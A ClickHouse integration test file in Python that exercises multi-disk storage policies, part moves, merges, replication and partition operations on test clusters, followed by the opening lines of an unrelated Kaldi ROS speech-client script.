return node.query("select disk_name from system.parts where table == '{}' and active=1 order by modification_time".format(table_name)).strip().split('\n')
def test_no_warning_about_zero_max_data_part_size(start_cluster):
def get_log(node):
return node.exec_in_container(["bash", "-c", "cat /var/log/clickhouse-server/clickhouse-server.log"])
for node in (node1, node2):
node.query("""
CREATE TABLE default.test_warning_table (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""")
node.query("""
DROP TABLE default.test_warning_table
""")
log = get_log(node)
assert not re.search("Warning.*Volume.*special_warning_zero_volume", log)
assert not re.search("Warning.*Volume.*special_warning_default_volume", log)
assert re.search("Warning.*Volume.*special_warning_small_volume", log)
assert not re.search("Warning.*Volume.*special_warning_big_volume", log)
@pytest.mark.parametrize("name,engine", [
("mt_on_jbod","MergeTree()"),
("replicated_mt_on_jbod","ReplicatedMergeTree('/clickhouse/replicated_mt_on_jbod', '1')",),
])
def test_round_robin(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
d UInt64
) ENGINE = {engine}
ORDER BY d
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
# first should go to the jbod1
node1.query("insert into {} select * from numbers(10000)".format(name))
used_disk = get_used_disks_for_table(node1, name)
assert len(used_disk) == 1, 'More than one disk used for single insert'
node1.query("insert into {} select * from numbers(10000, 10000)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert len(used_disks) == 2, 'Two disks should be used for two parts'
assert used_disks[0] != used_disks[1], "Should write to different disks"
node1.query("insert into {} select * from numbers(20000, 10000)".format(name))
used_disks = get_used_disks_for_table(node1, name)
# jbod1 -> jbod2 -> jbod1 -> jbod2 ... etc
assert len(used_disks) == 3
assert used_disks[0] != used_disks[1]
assert used_disks[2] == used_disks[0]
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_with_huge_part","MergeTree()"),
("replicated_mt_with_huge_part","ReplicatedMergeTree('/clickhouse/replicated_mt_with_huge_part', '1')",),
])
def test_max_data_part_size(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert len(used_disks) == 1
assert used_disks[0] == 'external'
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_with_overflow","MergeTree()"),
("replicated_mt_with_overflow","ReplicatedMergeTree('/clickhouse/replicated_mt_with_overflow', '1')",),
])
def test_jbod_overflow(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES")
# small jbod size is 40MB, so lets insert 5MB batch 7 times
for i in range(7):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert all(disk == 'jbod1' for disk in used_disks)
# should go to the external disk (jbod is overflown)
data = [] # 10MB in total
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert used_disks[-1] == 'external'
node1.query("SYSTEM START MERGES")
time.sleep(1)
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
time.sleep(2)
disks_for_merges = node1.query("SELECT disk_name FROM system.parts WHERE table == '{}' AND level >= 1 and active = 1 ORDER BY modification_time".format(name)).strip().split('\n')
assert all(disk == 'external' for disk in disks_for_merges)
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("moving_mt","MergeTree()"),
("moving_replicated_mt","ReplicatedMergeTree('/clickhouse/moving_replicated_mt', '1')",),
])
def test_background_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
# small jbod size is 40MB, so lets insert 5MB batch 5 times
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
retry = 20
i = 0
while not sum(1 for x in used_disks if x == 'jbod1') <= 2 and i < retry:
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
i += 1
assert sum(1 for x in used_disks if x == 'jbod1') <= 2
# first (oldest) part was moved to external
assert used_disks[0] == 'external'
path = node1.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' AND event_type='MovePart' ORDER BY event_time LIMIT 1".format(name))
# first (oldest) part was moved to external
assert path.startswith("/external")
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("stopped_moving_mt","MergeTree()"),
("stopped_moving_replicated_mt","ReplicatedMergeTree('/clickhouse/stopped_moving_replicated_mt', '1')",),
])
def test_start_stop_moves(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("INSERT INTO {} VALUES ('HELLO')".format(name))
node1.query("INSERT INTO {} VALUES ('WORLD')".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d == "jbod1" for d in used_disks), "All writes shoud go to jbods"
first_part = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1 ORDER BY modification_time LIMIT 1".format(name)).strip()
node1.query("SYSTEM STOP MOVES")
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
used_disks = get_used_disks_for_table(node1, name)
assert all(d == "jbod1" for d in used_disks), "Blocked moves doesn't actually move something"
node1.query("SYSTEM START MOVES")
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == "external"
node1.query("TRUNCATE TABLE {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
node1.query("SYSTEM STOP MERGES {}".format(name))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
# jbod size is 40MB, so lets insert 5MB batch 7 times
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
retry = 5
i = 0
while not sum(1 for x in used_disks if x == 'jbod1') <= 2 and i < retry:
time.sleep(0.1)
used_disks = get_used_disks_for_table(node1, name)
i += 1
# first (oldest) part doesn't move anywhere
assert used_disks[0] == 'jbod1'
node1.query("SYSTEM START MOVES {}".format(name))
node1.query("SYSTEM START MERGES {}".format(name))
# wait sometime until background backoff finishes
retry = 30
i = 0
while not sum(1 for x in used_disks if x == 'jbod1') <= 2 and i < retry:
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
i += 1
assert sum(1 for x in used_disks if x == 'jbod1') <= 2
# first (oldest) part moved to external
assert used_disks[0] == 'external'
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def get_path_for_part_from_part_log(node, table, part_name):
node.query("SYSTEM FLUSH LOGS")
path = node.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' and part_name = '{}' ORDER BY event_time DESC LIMIT 1".format(table, part_name))
return path.strip()
def get_paths_for_partition_from_part_log(node, table, partition_id):
node.query("SYSTEM FLUSH LOGS")
paths = node.query("SELECT path_on_disk FROM system.part_log WHERE table = '{}' and partition_id = '{}' ORDER BY event_time DESC".format(table, partition_id))
return paths.strip().split('\n')
@pytest.mark.parametrize("name,engine", [
("altering_mt","MergeTree()"),
#("altering_replicated_mt","ReplicatedMergeTree('/clickhouse/altering_replicated_mt', '1')",),
# SYSTEM STOP MERGES doesn't disable merges assignments
])
def test_alter_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name)) # to avoid conflicts
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 66)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-04-10'), 42)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-04-11'), 43)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
first_part = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1 ORDER BY modification_time LIMIT 1".format(name)).strip()
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == 'external'
assert get_path_for_part_from_part_log(node1, name, first_part).startswith("/external")
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PART '{}' TO DISK 'jbod1'".format(name, first_part))
disk = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, first_part)).strip()
assert disk == 'jbod1'
assert get_path_for_part_from_part_log(node1, name, first_part).startswith("/jbod1")
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201904 TO VOLUME 'external'".format(name))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201904' and active = 1".format(name)).strip().split('\n')
assert len(disks) == 2
assert all(d == "external" for d in disks)
assert all(path.startswith("/external") for path in get_paths_for_partition_from_part_log(node1, name, '201904')[:2])
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201904 TO DISK 'jbod2'".format(name))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201904' and active = 1".format(name)).strip().split('\n')
assert len(disks) == 2
assert all(d == "jbod2" for d in disks)
assert all(path.startswith("/jbod2") for path in get_paths_for_partition_from_part_log(node1, name, '201904')[:2])
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "4\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("volume_or_disk", [
"DISK",
"VOLUME"
])
def test_alter_move_half_of_partition(start_cluster, volume_or_disk):
name = "alter_move_half_of_partition"
engine = "MergeTree()"
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 42)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
time.sleep(1)
parts = node1.query("SELECT name FROM system.parts WHERE table = '{}' and active = 1".format(name)).splitlines()
assert len(parts) == 2
node1.query("ALTER TABLE {} MOVE PART '{}' TO VOLUME 'external'".format(name, parts[0]))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and name = '{}' and active = 1".format(name, parts[0])).splitlines()
assert disks == ["external"]
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201903' and active = 1".format(name)).splitlines()
assert disks == ["external"]*2
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "2\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("volume_or_disk", [
"DISK",
"VOLUME"
])
def test_alter_double_move_partition(start_cluster, volume_or_disk):
name = "alter_double_move_partition"
engine = "MergeTree()"
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-15'), 65)".format(name))
node1.query("INSERT INTO {} VALUES(toDate('2019-03-16'), 42)".format(name))
used_disks = get_used_disks_for_table(node1, name)
assert all(d.startswith("jbod") for d in used_disks), "All writes should go to jbods"
time.sleep(1)
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
disks = node1.query("SELECT disk_name FROM system.parts WHERE table = '{}' and partition = '201903' and active = 1".format(name)).splitlines()
assert disks == ["external"]*2
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "2\n"
time.sleep(1)
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {} MOVE PARTITION 201903 TO {volume_or_disk} 'external'".format(name, volume_or_disk=volume_or_disk))
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException as ex:
pass
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_mt","MergeTree()"),
("concurrently_altering_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_replicated_mt', '1')",),
])
def test_concurrent_alter_move(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def optimize_table(num):
for i in range(num):
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_dropping_mt","MergeTree()"),
("concurrently_dropping_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_dropping_replicated_mt', '1')",),
])
def test_concurrent_alter_move_and_drop(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_drop(num):
for i in range(num):
partition = random.choice([201903, 201904])
drach = random.choice(["drop", "detach"])
node1.query("ALTER TABLE {} {} PARTITION {}".format(name, drach, partition))
insert(100)
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_drop, (100,)))
for task in tasks:
task.get(timeout=60)
assert node1.query("SELECT 1") == "1\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("detach_attach_mt","MergeTree()"),
("replicated_detach_attach_mt","ReplicatedMergeTree('/clickhouse/replicated_detach_attach_mt', '1')",),
])
def test_detach_attach(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
node1.query("ALTER TABLE {} DETACH PARTITION tuple()".format(name))
assert node1.query("SELECT count() FROM {}".format(name)).strip() == "0"
assert node1.query("SELECT disk FROM system.detached_parts WHERE table = '{}'".format(name)).strip() == "jbod1"
node1.query("ALTER TABLE {} ATTACH PARTITION tuple()".format(name))
assert node1.query("SELECT count() FROM {}".format(name)).strip() == "5"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("mutating_mt","MergeTree()"),
("replicated_mutating_mt","ReplicatedMergeTree('/clickhouse/replicated_mutating_mt', '1')",),
])
def test_mutate_to_another_disk(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = {engine}
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external'
""".format(name=name, engine=engine))
for i in range(5):
data = [] # 5MB in total
for i in range(5):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name, ','.join(["('" + x + "')" for x in data])))
node1.query("ALTER TABLE {} UPDATE s1 = concat(s1, 'x') WHERE 1".format(name))
retry = 20
while node1.query("SELECT * FROM system.mutations WHERE is_done = 0") != "" and retry > 0:
retry -= 1
time.sleep(0.5)
if node1.query("SELECT latest_fail_reason FROM system.mutations WHERE table = '{}'".format(name)) == "":
assert node1.query("SELECT sum(endsWith(s1, 'x')) FROM {}".format(name)) == "25\n"
else: # mutation failed, let's try on another disk
print "Mutation failed"
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
node1.query("ALTER TABLE {} UPDATE s1 = concat(s1, 'x') WHERE 1".format(name))
retry = 20
while node1.query("SELECT * FROM system.mutations WHERE is_done = 0") != "" and retry > 0:
retry -= 1
time.sleep(0.5)
assert node1.query("SELECT sum(endsWith(s1, 'x')) FROM {}".format(name)) == "25\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("alter_modifying_mt","MergeTree()"),
("replicated_alter_modifying_mt","ReplicatedMergeTree('/clickhouse/replicated_alter_modifying_mt', '1')",),
])
def test_concurrent_alter_modify(start_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
for i in range(num):
produce_alter_move(node1, name)
def alter_modify(num):
for i in range(num):
column_type = random.choice(["UInt64", "String"])
node1.query("ALTER TABLE {} MODIFY COLUMN number {}".format(name, column_type))
insert(100)
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "100\n"
p = Pool(50)
tasks = []
for i in range(5):
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_modify, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "100\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
def test_simple_replication_and_moves(start_cluster):
try:
for i, node in enumerate([node1, node2]):
node.query("""
CREATE TABLE replicated_table_for_moves (
s1 String
) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_moves', '{}')
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
""".format(i + 1))
def insert(num):
for i in range(num):
node = random.choice([node1, node2])
data = [] # 1MB in total
for i in range(2):
data.append(get_random_string(512 * 1024)) # 500KB value
node.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
def optimize(num):
for i in range(num):
node = random.choice([node1, node2])
node.query("OPTIMIZE TABLE replicated_table_for_moves FINAL")
p = Pool(60)
tasks = []
tasks.append(p.apply_async(insert, (20,)))
tasks.append(p.apply_async(optimize, (20,)))
for task in tasks:
task.get(timeout=60)
node1.query("SYSTEM SYNC REPLICA replicated_table_for_moves", timeout=5)
node2.query("SYSTEM SYNC REPLICA replicated_table_for_moves", timeout=5)
node1.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
node2.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
data = [] # 1MB in total
for i in range(2):
data.append(get_random_string(512 * 1024)) # 500KB value
time.sleep(3) # wait until old parts will be deleted
node1.query("SYSTEM STOP MERGES")
node2.query("SYSTEM STOP MERGES")
node1.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
node2.query("INSERT INTO replicated_table_for_moves VALUES {}".format(','.join(["('" + x + "')" for x in data])))
time.sleep(3) # nothing was moved
disks1 = get_used_disks_for_table(node1, "replicated_table_for_moves")
disks2 = get_used_disks_for_table(node2, "replicated_table_for_moves")
node1.query("SYSTEM START MERGES")
node2.query("SYSTEM START MERGES")
set(disks1) == set(["jbod1", "external"])
set(disks2) == set(["jbod1", "external"])
finally:
for node in [node1, node2]:
node.query("DROP TABLE IF EXISTS replicated_table_for_moves")
def test_download_appropriate_disk(start_cluster):
try:
for i, node in enumerate([node1, node2]):
node.query("""
CREATE TABLE replicated_table_for_download (
s1 String
) ENGINE = ReplicatedMergeTree('/clickhouse/replicated_table_for_download', '{}')
ORDER BY tuple()
SETTINGS storage_policy='moving_jbod_with_external', old_parts_lifetime=1, cleanup_delay_period=1, cleanup_delay_period_random_add=2
""".format(i + 1))
data = []
for i in range(50):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO replicated_table_for_download VALUES {}".format(','.join(["('" + x + "')" for x in data])))
for _ in range(10):
try:
print "Syncing replica"
node2.query("SYSTEM SYNC REPLICA replicated_table_for_download")
break
except:
time.sleep(0.5)
disks2 = get_used_disks_for_table(node2, "replicated_table_for_download")
assert set(disks2) == set(["external"])
finally:
for node in [node1, node2]:
node.query("DROP TABLE IF EXISTS replicated_table_for_download")
def test_rename(start_cluster):
try:
node1.query("""
CREATE TABLE default.renaming_table (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""")
for _ in range(5):
data = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO renaming_table VALUES {}".format(','.join(["('" + x + "')" for x in data])))
disks = get_used_disks_for_table(node1, "renaming_table")
assert len(disks) > 1
assert node1.query("SELECT COUNT() FROM default.renaming_table") == "50\n"
node1.query("RENAME TABLE default.renaming_table TO default.renaming_table1")
assert node1.query("SELECT COUNT() FROM default.renaming_table1") == "50\n"
with pytest.raises(QueryRuntimeException):
node1.query("SELECT COUNT() FROM default.renaming_table")
node1.query("CREATE DATABASE IF NOT EXISTS test")
node1.query("RENAME TABLE default.renaming_table1 TO test.renaming_table2")
assert node1.query("SELECT COUNT() FROM test.renaming_table2") == "50\n"
with pytest.raises(QueryRuntimeException):
node1.query("SELECT COUNT() FROM default.renaming_table1")
finally:
node1.query("DROP TABLE IF EXISTS default.renaming_table")
node1.query("DROP TABLE IF EXISTS default.renaming_table1")
node1.query("DROP TABLE IF EXISTS test.renaming_table2")
def test_freeze(start_cluster):
try:
node1.query("""
CREATE TABLE default.freezing_table (
d Date,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY toYYYYMM(d)
SETTINGS storage_policy='small_jbod_with_external'
""")
for _ in range(5):
data = []
dates = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
dates.append("toDate('2019-03-05')")
node1.query("INSERT INTO freezing_table VALUES {}".format(','.join(["(" + d + ", '" + s + "')" for d, s in zip(dates, data)])))
disks = get_used_disks_for_table(node1, "freezing_table")
assert len(disks) > 1
assert node1.query("SELECT COUNT() FROM default.freezing_table") == "50\n"
node1.query("ALTER TABLE freezing_table FREEZE PARTITION 201903")
# check shadow files (backups) exists
node1.exec_in_container(["bash", "-c", "find /jbod1/shadow -name '*.mrk2' | grep '.*'"])
node1.exec_in_container(["bash", "-c", "find /external/shadow -name '*.mrk2' | grep '.*'"])
finally:
node1.query("DROP TABLE IF EXISTS default.freezing_table")
node1.exec_in_container(["rm", "-rf", "/jbod1/shadow", "/external/shadow"])
def test_kill_while_insert(start_cluster):
try:
name = "test_kill_while_insert"
node1.query("""
CREATE TABLE {name} (
s String
) ENGINE = MergeTree
ORDER BY tuple()
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
data = []
dates = []
for i in range(10):
data.append(get_random_string(1024 * 1024)) # 1MB value
node1.query("INSERT INTO {name} VALUES {}".format(','.join(["('" + s + "')" for s in data]), name=name))
disks = get_used_disks_for_table(node1, name)
assert set(disks) == {"jbod1"}
start_time = time.time()
long_select = threading.Thread(target=node1.query, args=("SELECT sleep(3) FROM {name}".format(name=name),))
long_select.start()
time.sleep(0.5)
node1.query("ALTER TABLE {name} MOVE PARTITION tuple() TO DISK 'external'".format(name=name))
assert time.time() - start_time < 2
node1.restart_clickhouse(kill=True)
try:
long_select.join()
except:
""""""
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["10"]
finally:
try:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
except:
"""ClickHouse may be inactive at this moment and we don't want to mask a meaningful exception."""
def test_move_while_merge(start_cluster):
try:
name = "test_move_while_merge"
node1.query("""
CREATE TABLE {name} (
n Int64
) ENGINE = MergeTree
ORDER BY sleep(2)
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 2
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
optimize = threading.Thread(target=optimize)
optimize.start()
time.sleep(0.5)
with pytest.raises(QueryRuntimeException):
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
exiting = False
no_exception = {}
def alter():
while not exiting:
try:
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
no_exception['missing'] = 'exception'
break
except QueryRuntimeException:
""""""
alter_thread = threading.Thread(target=alter)
alter_thread.start()
optimize.join()
time.sleep(0.5)
exiting = True
alter_thread.join()
assert len(no_exception) == 0
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["2"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
kaldi_ros.py | # Original Source Code: https://github.com/alumae/kaldi-gstreamer-server
__author__ = 'tanel and flier@techfak.uni-bielefeld.de'
# STD
import os
import sys
import json
import time
import Queue
import urllib
import argparse
import threading
# WS4PY
from ws4py.client.threadedclient import WebSocketClient
# ROS
import rospy
def rate_limited(maxPerSecond):
minInterval = 1.0 / float(maxPerSecond)
def decorate(func):
lastTimeCalled = [0.0]
def rate_limited_function(*args, **kargs):
elapsed = time.clock() - lastTimeCalled[0]
leftToWait = minInterval - elapsed
if leftToWait > 0:
time.sleep(leftToWait)
ret = func(*args, **kargs)
lastTimeCalled[0] = time.clock()
return ret
return rate_limited_function
return decorate
class KaldiRosClient(WebSocketClient):
